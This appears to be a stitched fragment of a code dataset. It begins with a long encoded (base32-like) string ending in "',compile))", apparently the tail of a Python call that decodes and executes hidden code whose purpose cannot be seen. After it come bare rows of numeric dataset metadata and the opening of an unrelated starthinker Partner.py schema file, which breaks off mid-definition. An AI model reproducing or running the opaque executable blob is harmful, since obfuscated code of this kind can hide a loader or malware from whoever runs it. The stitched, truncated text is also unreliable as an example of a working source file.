FJFLFGTCLJVNEMS2TKNHUUQSDKVLVMU2EJJJEMVKLK5JUOSSOJJKVKVSTJNEVURSVJNJTEV2HJJFUKVKUKNDEWWSLKZBVKMSHJJFEYRKZKJFVQS2VLJCVCU2TJNETKQ2VK5LFEU2KGVDEKNCRKNLEWNKMIZDVCMSMJRFEGVSLJVJVMR2KI5KVKU2TJFEVKMSGIVJTES2KJZDEKVKWJNFEWTK2IZHVGSZSJJHEWVSPKZFFGS2SIVKEWUSLKVFE4SSUIVLFGS2KLJDUKS2SGJKUSTSGIVMVGU2EJNNEMVSJKMZFMSSOJBCUSVSLKZFUUSSVK5JTEV2KKJGEKU2VLJJUUTSGIVKVEU2GJFHEYRSHKRBUYS22IRDE2URSKRFU4RSVKVKFGTCLLJCFMTKRGJKUUSSOIVGVMU2OJNHEUVSPKNFU6SSOJRDEWVSKKNFE4RKWJNLVGRSKIZFEKV2VGJGEUWSFKVFVMMSTJJGVURKTKZJUIS22IRLEWTKTLFFEURCFGRJEWSSLJJDFKWKTGJLUUSSEIVHVKWSTI5FEKVSVKMZEMSZVJNKVOVSDJRGEUQ2WJNHEGVCHJJCEKV2OJNFUWUSDKZEVCMSLJJJEMRKFKZFU4S2NLJDESURSJNFFES2VGZKTEVCJKJCVMTKTKNLUSVSLKRCVGU2LJFNEORKLKYZFOS2OJBCVOVCLGJEVMSKWI5KTEUCKIZFEKR2WKNEEWWSKKVMVGU2LJFNEWVCFKYZFISK2IRLEKU2TKVEVMSSUIVJVGSCLLJCEMTKTGJLUOSSMIVKVIU2IJFLEQVSHKUZEQSSOJZCUOVSTIZFU2WSGJ5JVGU2JKJBVMR2WKNKEUQSGKVGVGU2WJNLEURCFKYZEUS22I5CUWTKTK5FEUSSVK5LVGRKLKZFVMSKVGJDUUTSMIVKVEU2IJNCVURKVKRBUWSKSIRCTEVKTJRFFURSVGJLVGRSLKZFUKVKVGJGEWWSCKZGVIS2UI5FEGVKVKRJUUS22JNLEKUZSLFFE4SSFIVLEWUCLJZDFMR2TJNJUSTSLKU3FMU2UJJJEMRSFKJFVOSSWJJDEOUSTJBFUURSFJFJEWV2LJZDUKV2XKNDUWVSGKZGU2U2UJJHEQRKNKJFVIS22JJKTMU2LK5ETKTCFJ5KVUU2LJZDEKVKTINDEUNKMIVLVMQ2MJJNEMRSLKJFVIR2KJRKVKUKTJVEVMRSWJNLVGVCJGVDEKTKSJNHEWTSKKVGVGS2PJJJEGVSPKYZFISSSIVLFKUSTI5FE4SSFK5LEGS2KJJDUKS2VGJKUWTSHKVJVOU2FJNNEMVSLJVJUMSSKIRCVKUSLJZFUUSSVJVJTER2KJJFVKMSVGJGEUNKGIVKVGMSWJI2UWVSHKZBUWSKKIRDEWVSLKNFU4RCVKVLFGTCLKJBVMTKRGJGEUSSOIVCVEU2MJNMVURSJKMZE6SKOJNLE6VSTKRETKRSWKVJUGV2JGVDVMR2WKNFUUSSGIVFVGS2TJJHEORKXK5JUOS2WI5LEOTKTLBFEURSFK5LFGRCLKVNEKWKTJJLESWSEIUZFKWSTJNNEMRCLKRBUKSKWJNCUOUZSJNFEUQSWJVJTEV2KJZFUKV2UKNCUSVSLKU2FGMSLJJHEYRKZKZJVAS2VLJCTEU2TKNEVEQ2UJFKVGTCKKJDFIS2SKNLUSNKKKVLVIMSKJJNEMVSNKMZFOR2KJNCVGVCTIZFVUS2WI5GVGWCKIZEEKT2WKNEEWWSGKVLVGU2LJFLEGVKXKZBUYS2OIZCTIUZSIZFTKS2WI5ITESSMJJCFMTKSGJHEWTSDIVKVGU2LJFLEIVSFKNJVISSOJVLFKUSLJBFU2WSFGZJUWU2KJZBVMT2WJNKESUSFKZKVEU2GI5JEWRKHKJFUUS22IZCUWURSKRFU4R2FLFJVGRCLLJDFMR2NKNKUUSSIIVLVES2WJNJEUVKTKNFVOSSKJRCTMVSKKNEVURSFGRKFGRSLJZGEMR2UKNGEUVSOIVEVES2UJNHEMVKVKNJUIS2WJRLE2VJSJVFE4RSFJVLEGTCLJJFFMT2TJJLEUSSLKZHVMQSTJJHEMVSVKJJVOSSWJJCEKVRSJRFFUQSVJNKTET2KJZCFKV2WKNCEWWSCKZFU2U2JJJFEGVCFKZFVUS2KIJKU2UZSJ5EUUS2WJ5KTETCHJJCVMVKRGJLEWNKMIZDVIQ2MJJNEIRSLJZBVGSKOIRCVOTSLJVEVURCWIVJTETKKJZHEKSKSKNHEWSK2IZGVGMSPJJHEGVSLKVJVISRVIVLE2URSK5EVMS2UIVKDES2KLJCUKS2UJNLUWTSJIVLVIU2HJFNEOVSHKUZEISSGJJCUOVSLLBFVUSSWJFJTEU2JLJBVISKVKNKEWWSGKZGVGU2HJE2UYRSHKMZEWTCKINKUWVCLKNDUUTCVKNKFGR2LKZFVMT2VGJEUUTSOIVGVMU2OJJLEUVSBKNJUWSSCINKU6VKTJRGEERSWJVJVGVSKIZFFIRKNKNFEWWSHIVFVEMSVJJHEWRKXKNJUOSKWJNLEKUJSI5ETKRSFLFJEWSCLJJFFKWKUINFUSWSEIUZFKMSMJNJEIVKVKNBVMS2OJJLEOVCLJJFVURSGJVJTEVSLJZFUKVKUJJJUWVSGKZGVGU2WJJHEGVSVKJJVAS2OIZDE2U2TKNEU4S2VGZLFGS2LJZDEMRKSGJDEWVSKIVDVMU2LJJNEMRKLKYZFMS2OIVCVKU2TIREVMRSWJVJTEVSKJZEEKTKSJNMEWVSKKVEVGMRSJFNEWVCFKZFFGSSSIZCVKU2DIZFFMSSFK5JFGTCMJJDEMS2XJNKEOSSGKVJVOU2NJFKVURSLK5JVISSJGJKU2USTJZFUKWSGJVJDEMSKKJBUKS2WKNCEUTSEKZGVCMSXJJLEWRKXKUZEWSS2I5DEWVJSJ5FE4R2FK5KVGRCLLJDFMQ2NKNGUUSSIIVGVES2KJNFEMVKZKMZFUTCKIRCU6VK2KNFDKRKWKVITEV2KJZGEMR2WINFUUWSDKZGVMS2TI5FEYVKTJZFUYS2SINLE2UJSJRFEURSFJNJEWTCLLFNEMT2TJNHUSUSDKZHVMMSMI5FEKVSNKRFVOSSGJFKEKUSDJNEVUSCFJNLUWU2KJZDUKV2WJMZESVSNKZDU2USTJJDEYRKXKJFVQS2WJZDEOU22KZEVMS2FK5KTEVCJLJDFIS2TKNLUSNKLIVDVIS2LJJFEERKLKMZFIR2KJNKVKVCTJNFVMS2WJFKTETSKJZGEKMSWKNEEWVK2IU2FGU2PJJJEGVCFKZJVISSCIZLEWV2TIZFE4SSWI5JDES2LJJBFMS2OKNLUWTSLIVJVOU2HJNKVURSPKUZEOSSKIRCVKVSTJBFVCWSFKVKEGS2JJJGEKV2WKJJUWWSGKU2FGMSGJNLESVSHKIZEYS2VLJCU2USLKZDUUTCVKVJVGRKJKZGFMRKTGJEUUTSHKZKVES2WJNEVURSPKNFTESSSINLE6VSDJRFVERSWJVJFGVSHKJEVIRKSKNGUSWSFKZGVEMSTJNHEORKXKZJU6SKWI5LESTKTK5ETKRSFGJJEWVSLJJFFKMSTJNLUUSSMIUZFKWSTJRDEMRJUKNJUMSSWJRCVOVSTJRFFURSGJNLDEVCKJZDFKU2VKNCEWWSIKZGVGMSMJJHEQRKNKZBUYS2KJJKU2URSKNFEURCFJ5KVGVCKKZCVMVKSKNDUUVSKIRCVKU2MJJNEIVKLKYZFOSSNLJCVGVSTJBFVURKWI5GVGWCKJJEEKUKSJNNEWSSGKZGVGMSTJJFEWVSHKUZEYSZVIVKVKVCDIZDUUTCFKVKTETCHKZCEKS2OINKUWTSEIVJVMU2NJFLEYVSHKEZE2SSKJZCU2USTJZFVCWSGJFJTET2JJJFVMR2WJNKESUSGKZFU2MSHJJLEWVCFKZBUWSS2IVCUWUZSK5FU4TCFK5JVGQ2LLJDVMRKNKNGEUSSKIVMVES2QJNNEURSHKNJUWSKWJRDEWVKTKRFVURSGJVJVGRKJKZGEKV2UINFUYSSDIZFVGMSWI5FE2RKXKRJUGS2WJJLE6VJSJFFE4TSFIVLEUU2LKVNEMTKTKNFUSWSDKZBVKU2MJJBEMVSVKJJVOSSWJJKEKUZSJNFEURSWJVJDEVSMJJFFKT2TKNDEWVJSIZDU2U2WJJDEYRKZKJFVMS2VLJCVOU2TJNEVEQ2VK5LEGTCLJJCFKVKTGJLEWTSMIZDVGMSKJRFEGRSNKRFVMR2KI5CVKVCTJ5EVMR2WIVKTETKKJZEVMVKSKNEEWSK2IVLVGU2LJJHEYRKXKZJVIS2SIVLE2USLK5FVMSKWI5LDES2LLJCVMTKWJNLEOSSGKVKVOU2JJFLEMVSHKMZFQSSKIZCVOVSLLBFVMSSVJ5JTEV2JGVGEKT2WJJJUYQSGIVKVGU2GJRDEURKXKVBUYTCKIZDEWV2LKRFU4RSVKNKVGTKJKVNEMS2TGJKUURJSKVGVEU2OJNGVURSLKNFVOSSOIRCU6VJSIRFE4RSFKVIVGVSKKZFFIRKWGJFUUWSHIZFVMMSVJNHEGVKXKZJUWS22JBLEWTKTJRFEUSCFGRJEWUCLLJFFMQKTGJLEYSSEIZDVKMSUJFNEIVKVKMZFMR2KJNLEOUZSJRFVURCGJNLEWU2LJZCFKVKOJNFUWUSDKZFU2U2LJJJEMRKNKZJUUS2SIZLE6U2LJ5EU4Q2WI5LEGVCJGVCVMVKRGJLUSNKHKZDVEMSLJJFEKRKLK5FVGSSOIVCVOUSLGJEVMTKWI5KVUU2KIZFEKR2WJJJUWVSKKVMVGMSPJFNEWVCJKVJUIS22IZLE2UZSI5ETKS2FK5KEGTKKJJBFKTKUJNKUUTSLIVHVGU2IJNLEWVSHKUZFASSGJRCU2VSTIZFU2WSFGJJVGT2JLJBVKMSWKNKEWQSGKUZFOU2GI5NEUVKXKYZEUSS2I5CUWVRSK5FU4S2FK5KVGR2JKZFVMRKVGJMEUSSMIVKVES2IJNMVURKXKNJTESKSJRCTEVKSKNFU4RSFGRJFGVSLKZGFMR2SJNFEWWSEIZGVES2OJNHEWRKVKNJUSSKWJBLEKUZSLFFE4RSFKVLEWWCLJVNEMR2TJNHUUUSDKU3FMSSTJNJEMVCLKJJUMSSWJNDEOUSTJVEVURSFJVJDEVCJJZDUKV2TKNCUSVSHKZCU2U2VJE2UMRKJKZFVISZVJJKUWU2LKZGEURCFK5KEWVCLKZDEKS2NKNLEUTSMIVDVIQ2MJJLE4RKNKMZFISSOJRKVKUSTJVEVMSCWJNGVGRKKJJFEKTKSJNLEWSSCKVHVGU2PJJFEWRKLKZJUYSSOIZDFKUSTK5FE4TCFK5LEWTCKLJBVMS2WGJLUWTSIIVLVOU2DJNNEMVJSKUZFASSKIZCVCUSLLJFUURSWJVJTEMSKJJGEKQ2VLJJUWWSHIVKVCMSXJNHEWVCFKZBUUR2WINLE2USLKJDUUTCVKNKFGTKJLJCFMSKRGJGUUUSGIVEVEU2OJNGVURSRKMZE6SKSJNLE6VKTKRFE4RSWJVJTEV2KKZFFIRKUKNFUUSSEIVFVIS2XJJHEORKXKVFTESK2I5LEOTKTKBFEKMSVI5LFGTCLLFNEMSKTJJLESWSMIZFVKUSTJM2UKVCLKNJVKSKWJRCEKUZSJNEVMTSFJVJTEWCKJZFFKV2UKNGUSVSMKZHVKMSEJJHEYRKTKZJUQS2WJZDEOU2TI5FFEQ2VKNKVGTCMIJDFMRKTKNLUURSKKRCU2U2KJRFEMVSJKNFVOSKOI5CVOV2TI5FVERSWI5ITER2KJUZFKV2SKNEEWUSCKVMVIQ2LJFJEGVJSKZBUYS2OIZCTIU2TIZFDKSSWI5JEGTCLLJDFMTKSGJLEOSSIIVKVEU2NJFLEMVSNKUZEOSSOJNLFKUSTJRFU4SSVGZJUWV2KKJCEKV2WJNKEUUSGIVKVEU2WJNHEYVSHKJJUYR2WIZDE2URSJZFU4RSFKVLVGR2LLJDFMSKNKNMEUSSGIVKVMS2YJNLEUVKPKMZFMR2KIRCUWVCLKRETKRSFJVKEGRSLKZGEMR2TINGEYSSGIZFVMS2UJNGVURKTKZJUIS2WJRLEWVKTKRFE4SCFJVJEUVKLJJFFKTKUINDUUSSMIVHVKU2MJJJEORKVKJBUOSSOJBCUOVKTJBFEUR2GJNLEWVCLJZCVKU2WJMZESWSDKZDU2U22JJFEQRKNKJFVMS22IZKVCUZSJZGEUQ2FJNKTETCLGVDEMRKRGJLEOWSMIZDVGMSMJJNEIRSLKJFVGS2OIRCU6VKTJREVURCWIVKTESKKJJDEKT2SJNGEWWK2IZGVGS2PJFNEWVSTKUZFISJVIVLE2URSK5ETKR2WI5LEWSSHKZCEKS2WJNLUUTSMIVLVKU2LJNLE2VSHJVJVQSSKJJCVSUSLLBFVMTSGI5JTEV2JLJCEKS2VKNCESWSGIRFVGU2GJM2UURSHKRBUWSSKIJCU2VCLKVFE4S2VKNKFGRKLKZFVMRKVGJHEURSMIVIVMU2MJNGVURSLKNJUWSSCINKVGVSTKRFFURSVKVJFGVSKKZFFMR2SGJFUUSSGKZGVIMSXI5FEGRKVKNJUOSK2JNLEGTKTK5FEUSCFLFJEWWCLLJFFKWKTKMZESSSEIVLVMSSTJM2UMVJUKFJVMSZVJRLEOUSTJRFVMTSFJVJTETSLJZEEKVKTKNDUSVSJKZCVGMSTJJHEMRKNKJJUQS2NLJCVOU2LGJFE4TCFI5LEUU2LKJCFKVKSJNLUWVSKKRCVMS2KJNNEMVSJKJFVKSKOIVCVKU2TIVEVMRSWIVJTEVKJGVDEKV2WJNLEWSSKKVMVGS2XJJJEYRJSKVFFGSSSIZCU2VCTIZETKTCGI5JVGTCKKZHEKTKSJNKEOSSIKVKVKU2MJNNEMVSLKUZFKSSKJRCUWVSTJZFVEQSWJ5JVGT2KIZFUKS2WINCEUTSGIVKVCU2XJJLEYRKXKUZEWSS2IVCUWVRSKVFU4RCVK5LVGSKLLJCFMS2NKNIUUSSEIVIVES2IJNNEUVSBKMZFMTCKIRCVGVJSJRFE4RKWKVKEGRSHJJFVMR2WINGEOVSDKZFU4Q2UJNHEWVKTKZJUYS2SINLEOTKTJNFFERSFI5LEWTCLJVNEMRKSGJFUUUSLKZHVMQ2UJJLEKVSNKRBVOSSOJNKEKUSDJNFFUSCFJNLDEV2LJZCUKV2WJMZESWSJKZDVKMSMJJFEMRKHKZFVIS2WJJKVSU2TKNEVUTCGJNKVGVCJGVCVIS2TKNKUSVSKKRCVGU2MJJFEIVKLKMZFIR2KJRCVSU2TJNFVMSSWJ5KTESCKIZHEKT2WKNEEUVSKKVGVGU2HJJJEGVSLKVJUISK2IZKTIUKTKZFTKSSWI5JTESSLJJDFMS2NKNLEYSSKKVLU4S2FJNLEWVSHKEZFOSSOJBCVKVSTJBFVEQSVKVJTEMSJGVCEKMSWINGEWWSEKVKVEU2GJNLEWRSHKRBUYTCKIZLE2USLKZDUUSKVKVKFGRCLLJFVMRKTGJKUUTSIIVKVMS2WJNEVURKXKNJU6SSOINLEOVSTJRFVERSGIVJDERSLKZFEMR2WGJGEWWSGIVGVEMSXJNHEMVKPKZJUOSK2IZLE2TKTKRETKRSFJVLEWVSLJZFFKR2TGIZESWSLKREVMSSTJRBEMRKVKNBUMSSWJRCVOV2DJRDVMRSGJNKEWVCHJFNEKU2UKNGUSVSIKZEVGMSVJJGTEVKLKZBUYS2SJJKU2UZSJ5FFERCFJ5KTERCKJZDFMVKSKNDUUTSMKVLVMQ2IJJFEIRSLKUZFQS2OI5KVGVSTJVFVUR2VGJKTETSKJJFEKRKSJNHEWWSGIZFVGMSPJFNEYRJSKVNFGSZVIZCUKUJSK5FDKS2WIVKTES2KJJCFKS2WJNJEWTSEKVKVMU2MJFJEGVSLKUZESSSKIZCUWVSTJRFVURSWJFJTET2JLJFVMR2WKNKEUVSGKZKVCMSXJE2UOVSHKZBUWSSKIVCUWVSLKNFE4TCFK5LVGR2LLJAVMR2NKNFUUUSGIVDVMU2QJNKVURKZKMZE6SK2IRCUWVKKKNFVURSEJNKEGRSJGVGEKR2TGJGEUSSDIVFVIS2VJJHEUVKVKRJU2SKWJBLEWVJSJRFE4TCFJFLFGTSKKZFFKWKTKNHUUWSDKU3FKU2UJJNEMVKTK5JUOS2GJJKVOVBSJJGEURSWJVJTEV2LJZDUKT2TKNDEWWSHKZCU2U2YJJCTEVKVKZBUMS22IJKVOU2LGJEVMQ2VK5LEWTCLGVDEKNCTJNDEWNKMKZDVGMSMJNKVURKNKIZFIR2KJVCVKU2TIVEVMTKWIVJTEUKKJZFVMVKSINDEWTK2IU3FGSZSJFHEYRKXKZFFGS2SIVLFKUSTKZFFMS2FI5JFGTCLLJDUKSKSJNKUSTSHIVMVGU2EJFLEOVSJKMZFOSJVIZCVOUSLKZFU4SSVGJJUWV2KJJGEKV2WJJJUUVSGIVGVIQ2GJNDEYRSHKNJUYSS2IZDE2U2LKRFU4RSFJ5JVGTCLKZGFMTKVGJKUUTSKIVGVEU2OJNHEUVSPKNJVOSSKINCUWVK2KNFE4RSVKVIVGVSKJZFFIRKWKNGEUWSCKVFVMS2SJNHEKRKTKZJUYS22INLEGTKTLBFEURSFKFJEWVSLJJDFMUKTGIZESWSLKZJVKMSUI5FEMRKFKEZFMSZVJRDEKVJSJNDVMRCFJNHEGU2HJJGEKV2UKNGUWWSEKZBU2U2NJJJEMRKJKJJU4S2NLJCTIUZSJ5EU4S2WJNKTEVCKIZCVMTKRGJLUSVSKKRCVIMSLJJNEIRKLKZFVOSSKJNKVOVCLGJEVMSCWI5KTETCKJJEEKV2WINDEWWSGIZDVGMSTJFNEWRKXKVJUYS2WIZCTIU2LKVEVMSSGI5JTESCLLJCFKS2TGJJUOSSMKVJVIU2HJNLE2VSHKUZEKSSOJZCU6VSTJZFU2WSGJNJUUVSJLJBVMU2WKNGEWWSGIZKVEU2WJNHEUVKXKYZEUS2KI5CUWVJSKZGEUSSVKVJFGR2JKZFVMSKVGJDUUSSMIVMVES2YJNJEEVKXKMZDESK2IRCTEVSCKNFVERCVKVJUGRSMIZFFMR2SINGEYSSEIZGVGMSUI5FEWVKVKNJUGSKWI5LE2VJSK5FE4R2WKVJFGUCLJZFFKT2TKNDUUTSDKVLVMU2UJJJEMRJUKJFVOS2WJJCEKVRSJNEVURSFJNLDEV2HJJDUKVKXKNBUWVSGKZGU2U2QJJFEQRKFKZFVQS22JJKVKUZSGJEU4S2UIVLEUU2MIZDEKVKSKNDEOUSKIVLVGQ2MJRFEERSLJZBVIR2JLJCVGU2TIVEVMSCWJNGVGTKKJEZFKS2WKNDEWUSCKVGVGU2PJJHEWRKLKZJUISSSI5CVKUSDIZFE4SCFI5LEGTCKLJDFMS2VGJLUWTSGKVLVKU2EJNNEIVJSKUZEUSSKJBCTIUSLJBFVURSVGRJTEU2JLJGEKT2VGJKEUNKGIZCVCMSWI5NEWVCFKZBUWTCKIRDE2VCLKVEU4TCVKNLFGS2LLJCFMTKRGJGEUSSOIVHVES2MJNEVURSPKMZE6SKWINLE6VSTJRDUURKWJVJUGV2JGVFVIRKTINFUSWSGIVFVEMSXJNHEORKXKZJUWS22IVLEOVJSIRFEMTSFK5LEUU2LKZFFMSKTLJLESWSMIUZFKMSUJM2UKVCLKMZFKSKWJJKEKVCDJVFEUQSFJVKEWVCKJZFUKVKUKNGEWVSMKZEVKMSJJJDEYRKZKZFFKS2NLJCVCU2TJ5FEUQ2VGJLFGVCJKJDFMS2XKNDUUVSKKZDVGMSLJFFEEVSLJZJVOS2OINCVGV2TI5FVUR2WIVKTEV2KJUZFKV2SJNEEWTK2IVKVGMRSJFFEYRKXKRFVIS22IZCVKU2TKZGEMSKWI5JFGTCLKVNEKTKSGJKEOSSEKVKVGSSTJNLEYVSFKMZFSSSKJRCVKVSLLJFU2WSEIVJUUVSKKJBVIRKWJNFUWTSGKZKVEQ2WJNLEURCFKJJUYS22IZKU2URSKRFE4RSFK5LFGT2JKZDVMRKTGJLUSNKGIVDVMS2WJNJEMRSHKMZFOSJVJRCUWVSKKNFE4RSFGRJUGRSKKZGEKR2SKNGEUWSGIZFVEMSUJNHEQVKVKRJUYS22JBLE2VJSIVFEUSSFJVLFGRSLJJDFMT2TJNLUUSSDKZHVMU2UJJHEMRSVKJBVOSSWJJCEKVJSJBFEURCGJNKTEWCLJZCFKU2WKNEEWWSDKUZFKMSYJJFEIRKRKJFU4S2KIZLFKUZSJNFEUS2UJVKTETCLGVCVIS2UINDEWTSLIVLVMQ2MJNNEIRKNKJFVGS2OIRCVOTSLJVEVMTCWJNITETKKJZDEKTKSKNGEWNKGKZEVEMSLJJJEGVJWKZBVISKWIVLE2U2TK5FE4TCWI5LEGS2LJJCEKS2UJNJUUTSHIVKVMU2LJNNEOVSHKUZFQSSKJJCUOVSLKBFVUQSWJFJVGU2JLJBVMS2VJNKESNKGIU2FGU2VJFLEYRKHKRBUWTCKIRKU2UZSK5FE4TCFK5KFGRCLKZFFMT2VGJDEUTSOIVGVMSSTJNKVURKNKNJUWSK2INKTEVKTJRFEURSWKVJFGV2KKZFFIRKTKNGUUSSCKZFU4U2WI5FEORKTJZFUOSKVGJDEKUJSI5FESMSVK5JEWWCLLJBFKV2TGIZESUSDKVLVMU2MJNHEMVJUKJBVMS2WJJDEOUZSJRFVUR2GJVKEWVSHJJDUKVKTKNDUSVSHKZGVGMSNJJHE2VSVKJJUMS2NLJCTMU2LK5FE4TCFJ5LFEU2LKJDEMRKSKNLUWVSKKVDVMMSKJJNEIVSNKIZFIS2OIZKVKU2TIVEVMRSWJNJTEVCKJJDEKVKWJNMEWNKKKVDVGMSXJJDEYRKPKRFVGS2OIZCU2VCTIZFTKTCFI5KFGTCLKZHEKS2XJNJUOSSGKVJVOU2FJFKVURSLKUZEKSSGJZCUSVSTKZFU2WSFJ5JUUVSKJJBVKT2WINCEUTSHIVKVCMSGJJHEWRKXKUZEWSS2IZKUWVRSKVFU4R2VKNLFGSKLLJEFMS2NKNGUUSSIIU2FES2KJNNEUVSBKMZE4TCKINKESVJSKRETKRKWKVITEVSKJZGEMR2WINFUWSSEIVGVMS2UJNHEYVKVKZJUWS22IRLESTKTJNETKTCFIVLFGTSLJFNEMT2TGJHUUTSDKZDVKMSUJE2UMVSVKMZFOSKOJNKEKV2DJNEVURKFJNKDEV2LJZCUKV2SJMZESVSMKZDVKMSMJJDEQRKHKZFVQS2WJJDEOUZSJ5EVUS2UJFKVGVCJLJDFIS2UINDUSNKJKRCVIQ2MJRFEGVKNKRFVISSOJJCU6U2TJBEVMS2WI5KTESCKIZGEKWKWKNDEWTK2IZFVGU2PJJLEYRSLKVJVISSKIZKTIU2TK5FDKSSVKVLFGSSKLJDFMSKSJNLUUSSKKVJVKU2GJNNEWVSFKUZEQSSKJRCVKUSDIZFVSWSFKVJDEV2JLJBVKV2VKJJUWVSFKU2FEU2GJRDEUVSHKEZEYTCKIRLE2U2LKRDUUS2FKNHEWR2JKZEVMTKTGJKUUTSKIVKVMS2UJNGVURSPKNJVOSSSINKTMVSTJNFU4RSFKVJFGRSHKJFUKR2SKNFUUWSHIVGVEMSTJFHEORKVKZJU6SKWIZKTIVJSKVFE4SCFKVLEWVCLGVFFKSKTGIZEUQSMIVLVMSSTJJLEMRSFKJJUMSSWJRDEOUSTJRFEURSGJNKDEVCLJZEFKVKTKNGESVSGKZGVGU2UJJFEQRKLKZFVMS2KJJLE2U2TJ5FE4Q2FJNLFGVCKIJDEKTKUKNDEUTSMIRCVMU2MJJNEGRSLKUZFQS2OINCVOV2TIVFVURCVGJKTEWSKJJDEKUKSJNJEWSSGKZGVGMSLJFNEWVSDKVNFGSRVIVKVKUZSK5FDKS2WKVKTETCHKZCEKTKWJNJEOSSMIVLVIU2MJNNEGVSLJVJU2SSOIZCUOVSTJRFFUQSWI5JUWT2JKJBVMU2VKNKEUTSFKZKVEQ2XJJDEUVCFKRFUWSS2IRCUWUSLK5FU4SCFK5JUWMSJLJCVMRKNKNGEURJSKVLVMU2IJNJEUVKZKNJU6SKWJRCTEVKTJRFTKRSGJVJVGVKJKZFEKV2TGJFUWVSOIVGVGMSXJJHEYVKXKRJUQSKWJRLESVJSJBFEMTSFJ5LFGSCLKVNEMSKTKNFUUSSDKVJVKU2MJRBEMVSVKNJUOSJVJJKEKVJSJJGEUQSWJNJTEVSLJZBUKV2OJNDUSWSHKZDU2U2HJJCTEVKZKJBUMS2NLJCVSVCDJNEU4RCFGJLEGTCLJZCFKVKTGJDEWNKLIZDVEMSKJNNEMVSNKQZFMR2KINKVKVCTJ5EVMR2WJVJVGVSKJZBVMVKSKNFEWTSKKU3FGU2DJFHEYRJWKZFVISSSIZLFKUSTKZFFMSSWI5LFGS2HKZDEMSKSJNLEOSSGIVLVOU2IJFLEMVSHJVJVOSSKIZCVKVSLKZFVMSSVJ5JUWV2KJZGEKU2WJJJUSNKFKRFVEU2GJRDEURSHKNBUYSSKIJDEWV2LKRFU4RSVKNKVGRKJKZGFMTKVGJGUUTSMIVFVMSSVJNFEEVSNKMZE6SSCINLE6VKTJRFEURSWKVJDER2KKZFUKV2VKNEEUSSEKZFVMS2TJNHEQVKTKZJUQS22I5LEOTKTKBFEUSCFJVJEWRSLLJDFKNCTGJHUUSSEIUZFKMSUJNHEMRSFKEZFMR22JRDEOUSDJNFUURCFJNHEGU2LJZGFKV2WKNFUSVSMKZCU2U2MJJHE4RKNKZFUYS2ZLJDE6URSJNEVMQ2WJNKTEVCJKJDFMTKSKNLUUVSKKRCVMU2LJJFEIRKLKZFVOSSOJNCVOTSLJNFVMRKWI5GVEU2KIZDEKWKSJNIEWUSGKZEVGU2TJFNEGVSLKUZEISK2IZCTIVCDI5ETKTCGI5KEGS2KJJCEKTKUJNJEUTSLIVMVGU2NJFLEUVSPKUZEMSSGJNLFKUSTJRFFMSSWJNJVGS2KIJBVKV2WKNGEUWSGKUZFOU2HJI2UUVKVKZJUWSS2IZKUWUZSK5FU4Q2FKVLFGRSLLJFVMRKRGJLUUSSIIVKVES2YJNKVURKVKNJTESJVINKVOVSSKNFVMRSVGRJDERSLGVGFMR2SJNGEYSSDIZFU2U2WI5FEORKVKNJUOSKWI5LEKUZSJNFE4RSFJVLEUVKLJVNEKVKUINFUSUSEIVDVMSSTJJJEMRCLKJJUMS2WJFKEKVSTJBGEURSWJFJEWV2JJZDFKU2TKNCEWWSHKZGVGMSUJJHEQRKZKZFVIS22JJKVSUZSKNEU4TCFI5KEWVCKKJDEKVKUKNDEUNKKIVLVIQ2MJNLE4RKNKQZFISSOIZKVKU2TJRFVUSCWJNJTEVKKIUZFKS2WKNDEWSSKKZHVGSSWJJDEWRKLKZJFGSSOIZDFKUSTIZFE4TCFK5LDETCKLJDFKS2WGJHUUTSEKVJVOU2GJNNEIVJSKUZEKSSKIZCUKUSLJJFUURSGI5JTEWSMJJBVMU2VGJKESTSFKZKVGMSVJFLEYRCFKZBUYTCKIRCUWVCLKRFU4RCVKNHEWS2JKJBVMR2VGJGUUUSGIVEVEU2OJNJEMVSFKIZEWSSGJNLEWVJSJNFU4RSWJVJUWV2KKZFFMR2XINFUUWSFIVFVKS2XJJHE4RKXKNJUGS2WIZLEOVJSGJETKRSFLFJEUV2LLFNEKSKTJNFUSUSLKZFVKUSTJFNEIVKVKMZEMSZVJRDEOVCDJRGEURCFJVKEWU2HJJEVKVKTJJJUWVSJKZGVGMSWJJHEQRJSKZJVISSVLJDEGU2TGJFFERCGI5KVEU2LKJCFKNCRGJDEUVSKIZDVEU2MJNNEKVSJJVJVCSSJGJKVCVSLKVFU4TKWKNGTEUKKLJGEMU2SGJKEOTSDIVGVEU2GJNLESVBSKBFDKSCVKRJVSWJTKBHFMWKHKMZUIRSGIVKVCPJ5HU6SOLDDN5WXA2LMMUUSS===',compile))
| 6,939
| 27,655
| 0.994992
| 59
| 27,756
| 467.372881
| 0.779661
| 0.00029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063328
| 0.002126
| 27,756
| 4
| 27,655
| 6,939
| 0.932267
| 0.003387
| 0
| 0
| 0
| 0
| 0.990202
| 0.989768
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
430258e09d9842e5882cfb182c1142544184406c
| 11,705
|
py
|
Python
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 54
|
2019-01-23T10:30:56.000Z
|
2022-03-08T13:57:22.000Z
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 204
|
2019-08-29T04:58:17.000Z
|
2021-07-30T04:27:07.000Z
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 25
|
2019-04-01T21:08:25.000Z
|
2021-10-21T00:51:00.000Z
|
###########################################################################
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
Partner_Schema = [
{ "name":"common_data",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"id",
"type":"INTEGER",
